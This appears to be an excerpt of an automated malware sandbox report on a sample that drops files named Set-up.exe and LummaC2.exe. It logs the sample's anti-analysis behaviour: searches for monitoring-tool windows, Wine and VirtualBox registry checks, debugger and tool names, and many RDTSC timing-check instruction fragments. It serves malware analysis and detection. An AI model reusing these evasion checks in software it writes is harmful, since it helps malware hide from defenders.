Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01755588 push B40173CCh; retf	3_3_017555FD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01754A6B push edi; ret	3_3_01754A79
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01754A6B push edi; ret	3_3_01754A79
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01755588 push B40173CCh; retf	3_3_017555FD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01755588 push B40173CCh; retf	3_3_017555FD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01754A6B push edi; ret	3_3_01754A79
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01754A6B push edi; ret	3_3_01754A79
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01755588 push B40173CCh; retf	3_3_017555FD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_01755588 push B40173CCh; retf	3_3_017555FD

Source: OAKPYEH4c6.exe

Static PE information: section name: pjfeqmbk entropy: 7.954441011910132

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe			Jump to dropped file
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: OAKPYEH4c6.exe	Binary or memory string: SBIEDLL.DLL
Source: OAKPYEH4c6.exe, 00000000.00000002.1567434103.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp, OAKPYEH4c6.exe, 00000000.00000003.1526413340.00000000058E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLN@
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1541743616.000000000136B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 15BE0BD second address: 15BE0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1739A45 second address: 1739A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33985001E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 172BCC7 second address: 172BCD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738AED second address: 1738AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738C87 second address: 1738C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738C8B second address: 1738C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738C98 second address: 1738C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738F49 second address: 1738F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738F4E second address: 1738F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B58Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738F5E second address: 1738F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1738F64 second address: 1738F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17390B3 second address: 17390CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17390CD second address: 17390D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 17390D2 second address: 1739102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jng 00007F33985001D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F33985001E6h 0x00000017 jo 00007F33985001DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1739102 second address: 173910E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F3398F1B586h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CD68 second address: 173CD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CE0C second address: 173CE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CF1A second address: 173CF59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F33985001E1h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D282Fh] 0x00000014 push 00000000h 0x00000016 movsx edx, dx 0x00000019 call 00007F33985001D9h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F33985001DDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CF59 second address: 173CF5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CF5F second address: 173CF64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CF64 second address: 173CF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 ja 00007F3398F1B594h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F3398F1B58Fh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b jnp 00007F3398F1B586h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CF9F second address: 173CFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F33985001E5h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CFC3 second address: 173CFC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CFC7 second address: 173CFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173CFD0 second address: 173CFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173D128 second address: 173D12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173D12C second address: 173D132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173D132 second address: 173D137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 173D250 second address: 173D257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 174E14B second address: 174E150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175EA12 second address: 175EA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B598h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175EA2F second address: 175EA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175EA35 second address: 175EA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175C8C0 second address: 175C8CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F33985001D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175C8CE second address: 175C91A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F3398F1B599h 0x0000000d jbe 00007F3398F1B592h 0x00000013 je 00007F3398F1B586h 0x00000019 jns 00007F3398F1B586h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F3398F1B596h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175C91A second address: 175C91E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175CA99 second address: 175CAA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175CAA6 second address: 175CAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33985001E3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175CBFA second address: 175CC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F3398F1B58Dh 0x0000000d pop edx 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175CD6D second address: 175CD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175CD71 second address: 175CD77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175CED1 second address: 175CEE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F33985001DEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D036 second address: 175D081 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3398F1B586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F3398F1B596h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 je 00007F3398F1B5A1h 0x00000019 jmp 00007F3398F1B599h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D081 second address: 175D085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D085 second address: 175D0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3398F1B593h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D0A4 second address: 175D0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D38B second address: 175D38F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D38F second address: 175D3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F33985001DCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D3A3 second address: 175D3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D7C6 second address: 175D7D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D7D0 second address: 175D807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3398F1B599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F3398F1B58Ch 0x00000010 pushad 0x00000011 jne 00007F3398F1B586h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D94B second address: 175D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D950 second address: 175D956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D956 second address: 175D95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175D95C second address: 175D960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1754407 second address: 1754431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33985001E3h 0x00000009 jmp 00007F33985001E2h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1754431 second address: 175446D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F3398F1B586h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F3398F1B597h 0x00000015 jnc 00007F3398F1B586h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007F3398F1B586h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E192 second address: 175E198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E198 second address: 175E1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3398F1B58Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E30D second address: 175E316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E316 second address: 175E34C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F3398F1B5C1h 0x00000010 jbe 00007F3398F1B58Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F3398F1B596h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E34C second address: 175E35B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33985001DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E491 second address: 175E49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E5E2 second address: 175E5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F33985001D6h 0x0000000a popad 0x0000000b jl 00007F33985001D8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E5F5 second address: 175E5FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E5FA second address: 175E61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F33985001DCh 0x00000010 jns 00007F33985001DAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 175E61B second address: 175E634 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3398F1B58Eh 0x00000008 jng 00007F3398F1B586h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jg 00007F3398F1B586h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1760EDD second address: 1760EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OAKPYEH4c6.exe	RDTSC instruction interceptor: First address: 1760EE1 second address: 1760EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
